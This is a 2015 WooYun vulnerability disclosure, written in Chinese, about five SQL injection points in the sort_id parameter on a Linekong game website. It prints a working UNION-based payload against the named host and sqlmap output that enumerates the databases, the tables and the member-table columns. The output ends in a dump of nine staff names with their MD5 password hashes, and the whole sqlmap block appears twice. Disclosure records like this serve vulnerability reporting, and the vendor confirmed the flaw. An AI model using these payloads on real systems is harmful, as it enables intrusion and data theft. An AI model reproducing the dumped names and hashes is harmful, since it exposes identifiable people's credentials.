当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119438

漏洞标题:蓝港科技(热血西游)网站多处SQL注入打包

相关厂商:linekong.com

漏洞作者: 路人甲

提交时间:2015-06-10 09:46

修复时间:2015-07-25 18:26

公开时间:2015-07-25 18:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经确认,细节仅向厂商公开
2015-06-20: 细节向核心白帽子及相关领域专家公开
2015-06-30: 细节向普通白帽子公开
2015-07-10: 细节向实习白帽子公开
2015-07-25: 细节向公众公开

简要描述:

RT

详细说明:

五处注入(三处POST,两处GET)
第一处POST注入

http://rx.8864.com/gonglist.php?sort_id=*
POST参数
passportName_login=vhuuhbwv&passportPswd_login=111122223&save=on&save_password=on&validate_login=vhuuhbwv
注入点:sort_id


第二处POST注入

http://rx.8864.com/imagelist.php?page=2&sort_id=*
POST参数
passportName_login=cyfjcsuj&passportPswd_login=111122223&save=on&save_password=on&validate_login=cyfjcsuj
注入点:sort_id


第三处 GET注入

http://rx.8864.com/imagelist.php?page=2&sort_id=*
注入点:sort_id


第四处 POST注入

http://rx.8864.com/imagelist.php?&sort_id=*
POST参数
passportName_login=rmsggysd&passportPswd_login=111122223&save=on&save_password=on&validate_login=rmsggysd
注入点:sort_id


第五处GET注入
第三处 GET注入

http://rx.8864.com/imagelist.php?&sort_id=*
注入点:sort_id


1.jpg


sqlmap identified the following injection points with a total of 891 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 6013,6013,[QUERY],6013--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] information_schema
[*] rxxy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 1926,1926,[QUERY],1926--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
[31 tables]
+------------------------------+
| rxxy_activity_firstjh_cdkey |
| rxxy_activity_firstjh_log |
| rxxy_activity_firstjh_lunpan |
| rxxy_activity_firstjh_vote |
| rxxy_address |
| rxxy_article |
| rxxy_article_inserl |
| rxxy_build |
| rxxy_channel |
| rxxy_columns |
| rxxy_comment |
| rxxy_download |
| rxxy_editors_inserl |
| rxxy_flash |
| rxxy_grading |
| rxxy_group |
| rxxy_image |
| rxxy_image_inserl |
| rxxy_member |
| rxxy_passportstat |
| rxxy_sort |
| rxxy_template |
| rxxy_url |
| rxxy_url_inserl |
| rxxy_vote |
| rxxy_vote_inserl |
| rxxy_vote_option |
| rxxy_wj_article |
| rxxy_wj_article_inserl |
| rxxy_wj_image |
| rxxy_wj_image_inserl |
+------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 9254,9254,[QUERY],9254--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 4670,4670,[QUERY],4670--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 7537,7537,[QUERY],7537--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 6116,6116,[QUERY],6116--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[9 entries]
+-----------+----------------------------------+
| user_name | user_passwd |
+-----------+----------------------------------+
| 董勇 | 862f3760ca3293437b53cac01b0ffe29 |
| 王磊 | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师 | cbef2ead7978557272b0c692f356b3cd |
| 韩秋莹 | 2f090f77c0d55fdf508e324140050160 |
| 张静 | a10f4b7e48419178177232d2d31dc4b8 |
| 张晨 | 92a870e23eaac7b3c576e91b807f2a60 |
| 李治 | 7e42a7ea7643c35fa5854f0f8d6e9131 |
| 黄孟琪 | 471c75ee6643a10934502bdafee198fb |
+-----------+----------------------------------+

漏洞证明:

sqlmap identified the following injection points with a total of 891 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 6013,6013,[QUERY],6013--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] information_schema
[*] rxxy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 1926,1926,[QUERY],1926--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
[31 tables]
+------------------------------+
| rxxy_activity_firstjh_cdkey |
| rxxy_activity_firstjh_log |
| rxxy_activity_firstjh_lunpan |
| rxxy_activity_firstjh_vote |
| rxxy_address |
| rxxy_article |
| rxxy_article_inserl |
| rxxy_build |
| rxxy_channel |
| rxxy_columns |
| rxxy_comment |
| rxxy_download |
| rxxy_editors_inserl |
| rxxy_flash |
| rxxy_grading |
| rxxy_group |
| rxxy_image |
| rxxy_image_inserl |
| rxxy_member |
| rxxy_passportstat |
| rxxy_sort |
| rxxy_template |
| rxxy_url |
| rxxy_url_inserl |
| rxxy_vote |
| rxxy_vote_inserl |
| rxxy_vote_option |
| rxxy_wj_article |
| rxxy_wj_article_inserl |
| rxxy_wj_image |
| rxxy_wj_image_inserl |
+------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 9254,9254,[QUERY],9254--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 4670,4670,[QUERY],4670--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 7537,7537,[QUERY],7537--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 6116,6116,[QUERY],6116--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[9 entries]
+-----------+----------------------------------+
| user_name | user_passwd |
+-----------+----------------------------------+
| 董勇 | 862f3760ca3293437b53cac01b0ffe29 |
| 王磊 | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师 | cbef2ead7978557272b0c692f356b3cd |
| 韩秋莹 | 2f090f77c0d55fdf508e324140050160 |
| 张静 | a10f4b7e48419178177232d2d31dc4b8 |
| 张晨 | 92a870e23eaac7b3c576e91b807f2a60 |
| 李治 | 7e42a7ea7643c35fa5854f0f8d6e9131 |
| 黄孟琪 | 471c75ee6643a10934502bdafee198fb |
+-----------+----------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-10 18:25

厂商回复:

该产品已下线,我们着手关闭站点的操作。感谢

最新状态:

暂无


漏洞评价:

评论